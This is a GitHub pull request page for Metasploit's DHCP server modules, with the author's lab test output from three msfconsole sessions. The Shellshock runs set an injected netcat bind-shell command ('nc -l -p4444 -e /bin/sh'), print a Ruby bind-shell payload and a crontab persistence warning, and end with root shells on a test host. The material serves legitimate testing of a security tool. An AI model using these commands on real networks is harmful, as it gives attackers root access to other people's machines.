Make DHCP use report_host() and add verbose option#21125
Open
g0tmi1k wants to merge 6 commits intorapid7:masterfrom
Open
Make DHCP use report_host() and add verbose option#21125g0tmi1k wants to merge 6 commits intorapid7:masterfrom
g0tmi1k wants to merge 6 commits intorapid7:masterfrom
Conversation
g0tmi1k
force-pushed
the
verbose_dhcp
branch
2 times, most recently
from
98bdd55 to
5f17958
Compare
Contributor
Author
auxiliary/server/dhcp$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status;
workspace -D; set VERBOSE true; setg LHOST tap0;
use auxiliary/server/dhcp;
set SRVHOST 10.0.0.1;
set NETMASK 255.255.255.0;
set DHCPIPSTART 10.0.0.2;
set DHCPIPEND 10.0.0.20;
set DHCPINTERFACE tap0;
options; run'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: dJPQXstN.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
LHOST => tap0
SRVHOST => 10.0.0.1
NETMASK => 255.255.255.0
DHCPIPSTART => 10.0.0.2
DHCPIPEND => 10.0.0.20
DHCPINTERFACE => tap0
Module options (auxiliary/server/dhcp):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
DHCPINTERFACE tap0 no The network interface to use for broadcast
DHCPIPEND 10.0.0.20 no The last IP to give out
DHCPIPSTART 10.0.0.2 no The first IP to give out
DNSSERVER no The DNS server IP address
DOMAINNAME no The optional domain name to assign
FILENAME no The optional filename of a tftp boot server
HOSTNAME no The optional hostname to assign
HOSTSTART no The optional host integer counter
NETMASK 255.255.255.0 yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST 10.0.0.1 yes The IP of the DHCP server
Auxiliary action:
Name Description
---- -----------
Service Run DHCP server
View the full module info with the info, or info -d command.
[*] Auxiliary module running as background job 0.
[*] Starting DHCP server
msf auxiliary(server/dhcp) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf auxiliary(server/dhcp) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
* default 1 0 0 0 0 0
msf auxiliary(server/dhcp) >
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf auxiliary(server/dhcp) >
msf auxiliary(server/dhcp) >
msf auxiliary(server/dhcp) > hosts -v
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.0.3 52:54:00:12:34:56 Discovered via DHCP
msf auxiliary(server/dhcp) >auxiliary/server/dhclient_bash_env$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status;
workspace -D; set VERBOSE true; setg LHOST tap0;
use auxiliary/server/dhclient_bash_env;
set CMD /bin/nc -l -p4444 -e /bin/sh &;
set SRVHOST 10.0.0.1;
set NETMASK 255.255.255.0;
set DHCPIPSTART 10.0.0.2;
set DHCPIPEND 10.0.0.20;
set DHCPINTERFACE tap0;
options; run'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: dJPQXstN.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
LHOST => tap0
CMD => /bin/nc -l -p4444 -e /bin/sh &
SRVHOST => 10.0.0.1
NETMASK => 255.255.255.0
DHCPIPSTART => 10.0.0.2
DHCPIPEND => 10.0.0.20
DHCPINTERFACE => tap0
Module options (auxiliary/server/dhclient_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
CMD /bin/nc -l -p4444 -e /bin/sh & yes The command to run
DHCPINTERFACE tap0 no The network interface to use for broadcast
DHCPIPEND 10.0.0.20 no The last IP to give out
DHCPIPSTART 10.0.0.2 no The first IP to give out
DNSSERVER no The DNS server IP address
FILENAME no The optional filename of a tftp boot server
HOSTSTART no The optional host integer counter
NETMASK 255.255.255.0 yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST 10.0.0.1 yes The IP of the DHCP server
Auxiliary action:
Name Description
---- -----------
Service Run Shellshock DHCP server
View the full module info with the info, or info -d command.
[*] Auxiliary module running as background job 0.
[*] Starting DHCP server
msf auxiliary(server/dhclient_bash_env) >
msf auxiliary(server/dhclient_bash_env) >
msf auxiliary(server/dhclient_bash_env) >
msf auxiliary(server/dhclient_bash_env) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf auxiliary(server/dhclient_bash_env) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(multi/handler) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(multi/handler) > run
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
[*] Started bind TCP handler against 10.0.0.3:4444
[*] Command shell session 1 opened (10.0.0.1:34169 -> 10.0.0.3:4444) at 2026-03-18 11:00:23 +0000
id
uid=0(root) gid=102(dhcp) groups=0(root)exploit/unix/dhcp/bash_environment$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status;
workspace -D; set VERBOSE true; setg LHOST tap0;
use exploit/unix/dhcp/bash_environment;
set SRVHOST 10.0.0.1;
set NETMASK 255.255.255.0;
set DHCPIPSTART 10.0.0.2;
set DHCPIPEND 10.0.0.20;
set DHCPINTERFACE tap0;
set payload payload/cmd/unix/bind_ruby; set RHOST 10.0.0.1;
options; run'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: dJPQXstN.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
LHOST => tap0
SRVHOST => 10.0.0.1
NETMASK => 255.255.255.0
DHCPIPSTART => 10.0.0.2
DHCPIPEND => 10.0.0.20
DHCPINTERFACE => tap0
payload => cmd/unix/bind_ruby
RHOST => 10.0.0.1
Module options (exploit/unix/dhcp/bash_environment):
Name Current Setting Required Description
---- --------------- -------- -----------
BROADCAST no The broadcast address to send to
DHCPINTERFACE tap0 no The network interface to use for broadcast
DHCPIPEND 10.0.0.20 no The last IP to give out
DHCPIPSTART 10.0.0.2 no The first IP to give out
DNSSERVER no The DNS server IP address
FILENAME no The optional filename of a tftp boot server
HOSTSTART no The optional host integer counter
NETMASK 255.255.255.0 yes The netmask of the local subnet
ROUTER no The router IP address
SRVHOST 10.0.0.1 yes The IP of the DHCP server
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.0.0.1 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
[+] ruby -rsocket -e 'exit if fork;s=TCPServer.new("4444");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end;end'
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Launching exploit. This may take up to 60 seconds.
[!] This module adds a job to /etc/crontab which may require manual removal!
[*] Starting DHCP server
msf exploit(unix/dhcp/bash_environment) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(multi/handler) >
[*] DHCPDISCOVER from 52:54:00:12:34:56
[+] DHCPREQUEST 52:54:00:12:34:56 -> 10.0.0.3
msf exploit(multi/handler) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.3:4444
[*] Command shell session 1 opened (10.0.0.1:44873 -> 10.0.0.3:4444) at 2026-03-18 11:03:13 +0000
id
uid=0(root) gid=102(dhcp) groups=0(root)
^Z
Background session 1? [y/N] y
msf exploit(multi/handler) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
* default 1 0 1 0 0 0
msf exploit(multi/handler) > hosts -v
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.0.3 52:54:00:12:34:56 Discovered via DHCP
msf exploit(multi/handler) > |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Related Issue: #21121
The idea is to see when a client is trying to connect, and then its been given an IP.
When we give out an IP address, record the host!